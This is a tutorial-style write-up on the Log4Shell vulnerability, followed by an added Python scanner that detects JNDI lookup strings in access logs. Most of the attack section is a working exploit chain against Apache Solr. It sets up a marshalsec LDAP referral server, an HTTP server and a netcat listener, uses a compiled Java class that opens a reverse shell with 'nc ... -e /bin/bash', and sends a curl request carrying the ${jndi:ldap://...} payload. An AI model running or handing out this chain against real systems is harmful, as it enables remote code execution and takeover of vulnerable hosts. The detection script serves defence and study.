# Log4Shell

## Background
The Log4j vulnerability is a critical security flaw that gained widespread attention in December 2021. Its exploitation is often called Log4Shell because it is used to gain shell access. Log4j is a logging framework that developers use to record activity within their applications. It is part of the Apache Logging Services, and the library is known for its performance and flexibility, offering logging capabilities that have become essential in software development.

The exploit takes advantage of the way Log4j processes log messages by misusing the library's Java Naming and Directory Interface (JNDI) lookup feature. JNDI is a Java API that lets Java clients look up data and resources (such as objects) by name. The exploit occurs when a maliciously crafted log message, resolved by Log4j at the moment it is logged, triggers a JNDI lookup to an attacker-controlled server, leading to the execution of arbitrary code on the application host.
## Process

There are a great many applications that rely on Log4j, but one of the most notable is Apache Solr, which the example below targets. Once you have identified a service that is vulnerable, you can set up testing. Testing means getting an LDAP server running to answer the JNDI lookup and point the target at the exploit class, which you can do through the referenced repo's .jar file. You then set up an http server on the attacker host as a means of delivering the exploit. You'll also have a netcat listener set up to receive the callback once the JNDI lookup in the logging path executes the exploit.

### What does that actually look like?
- First grab tools.

  ```bash
  git clone https://github.com/mbechler/marshalsec
  cd marshalsec && ls
  ```

- Open a second terminal and fire up an http server on port 8080.

  ```bash
  python3 -m http.server 8080
  ```

- Open a third terminal for the netcat listener.

  ```bash
  nc -lvnp 4444
  ```

- Establish the attacker-controlled LDAP server by getting the .jar running. Note: you'll need to enter the appropriate jar version based on what you downloaded, and enter your http server's IP and the name of your exploit (which will be created in the next step).

  ```bash
  java -cp target/marshalsec-[VERSION]-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOURHTTPSERVERIP:8080/#EXPLOITNAME"
  ```

- Craft the exploit.

  ```bash
  nano EXPLOITNAME.java
  ```

  ```java
  public class EXPLOITNAME {
      static {
          try {
              java.lang.Runtime.getRuntime().exec("nc NETCATIP 4444 -e /bin/bash");
          } catch (Exception err) {
              err.printStackTrace();
          }
      }
  }
  ```

- Compile the exploit.

  ```bash
  javac EXPLOITNAME.java
  ls
  ```

- Time for the fun.

  ```bash
  curl 'http://VICTIMDOMAIN:8983/solr/admin/cores?foo=$\{jndi:ldap://LDAPSERVERIP:1389/EXPLOITNAME\}'
  ```
If it executes successfully, running curl will produce output from the http server first, then the LDAP server, and finally the netcat listener, where you will have shell access.
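On the defensive side, the request above leaves a recognisable trace in the target's web access logs. The following is an added detection example, not part of the original write-up: a Python scanner that flags the `${jndi:<scheme>://host:port/path}` lookup string after undoing URL encoding and the backslash-escaped braces the curl command carries, and extracts the callback host for incident response. The log lines and addresses are constructed.

```python
"""Detect Log4Shell-style JNDI lookup strings in web access logs.

Added defensive example. The access-log lines below are constructed, not
real traffic; the regex targets the ${jndi:...} syntax used in the request
from the write-up above.
"""
import re
from urllib.parse import unquote

# ${jndi:<scheme>://<host>[:<port>][/<path>]} -- the lookup Log4j resolves at log time.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

def normalize(line: str) -> str:
    """Undo the encodings a request line typically arrives with.

    URL-decodes repeatedly (clients and proxies may encode '$', '{', '}' once or
    twice) and drops the backslashes that the shell-escaped curl form puts in
    front of the braces.
    """
    prev, cur = None, line
    while prev != cur:  # stop once decoding no longer changes anything
        prev, cur = cur, unquote(cur)
    return cur.replace("\\{", "{").replace("\\}", "}")

def find_jndi_lookups(lines):
    """Return one dict per JNDI lookup found: line number, scheme, callback host/port/path."""
    hits = []
    for lineno, raw in enumerate(lines, start=1):
        for m in JNDI_RE.finditer(normalize(raw)):
            hits.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": int(m.group("port")) if m.group("port") else None,
                "path": m.group("path") or "/",
            })
    return hits

# Constructed sample access-log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /solr/admin/cores?foo=bar HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Dec/2021:12:00:02 +0000] "GET /solr/admin/cores?foo=$\\{jndi:ldap://198.51.100.7:1389/Exploit\\} HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Dec/2021:12:00:03 +0000] "GET /solr/admin/cores?foo=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2FExploit%7D HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup to {hit['host']}:{hit['port']}{hit['path']}")
```

The extracted host and port are what a responder pivots on: an outbound connection from the application host to that address around the same timestamp confirms the lookup was actually resolved rather than merely logged.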